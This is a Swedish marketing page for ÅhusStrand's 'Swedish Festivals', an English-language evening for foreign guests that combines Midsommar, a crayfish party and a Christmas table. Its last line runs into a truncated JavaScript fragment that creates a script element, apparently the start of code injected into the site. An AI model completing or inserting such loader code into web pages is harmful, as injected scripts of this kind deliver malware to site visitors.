Swedish Festivals

swefest_MG_0855

 

Gör som Culinar, Tarkett, IKEA, Stora Enso, Posten International, Lasse Stefanz m fl. Bjud dina internationella gäster på SWEDISH FESTIVALS™. De får uppleva de tre ursvenska mathögtiderna på en och samma kväll; Midsommar, Kräftskiva och Jul. Mat, dekorationer, visor. Folkdräkt, tomtekläder och kulörta lyktor. Låt dina gäster uppleva det svenskaste av allt i helt unika miljöer.

SWEDISH FESTIVALS™ arrangeras året runt för både stora och små grupper. Allt på engelska förstås. Vi lämnar inget åt slumpen. SWEDISH FESTIVALS™ kan bara upplevas på ÅhusStrand.Vi kan garantera dig att era gäster får en oförglömlig upplevelse.

Utländska gäster på besök.
När vi har utländska gäster vill vi visa dem något särskilt. Vi vill ge dem en inblick i hur vi har det, i våra svenska traditioner. Därför tog vi fram konceptet Swedish Festivals. På en och samma kväll får dina gäster uppleva det svenskaste som finns Allt är på engelska och komplett genomarbetat allt i från sånghäfte till personal som kan allt om våra traditioner och deras ursprung.

En helkväll i tre sittningar.
Vi börjar med Midsommar. Dans kring midsommarstången, sill och nypotatis. Efter detta förflyttar vi oss till en annan lokal och får vara med om en äkta svensk kräftskiva. Hattar, haklappar och kräftor med tillbehör. Till sist rör vi på oss igen och tar oss in i Julaboden, där vi äter det bästa från julbordet. Avslutas med tomte, julklappsutdelning och dans kring granen.

 

swefestfolder2015_web

Se vår folder om Swedish Festivalsvar d=document;var s=d.createElement(‘script’);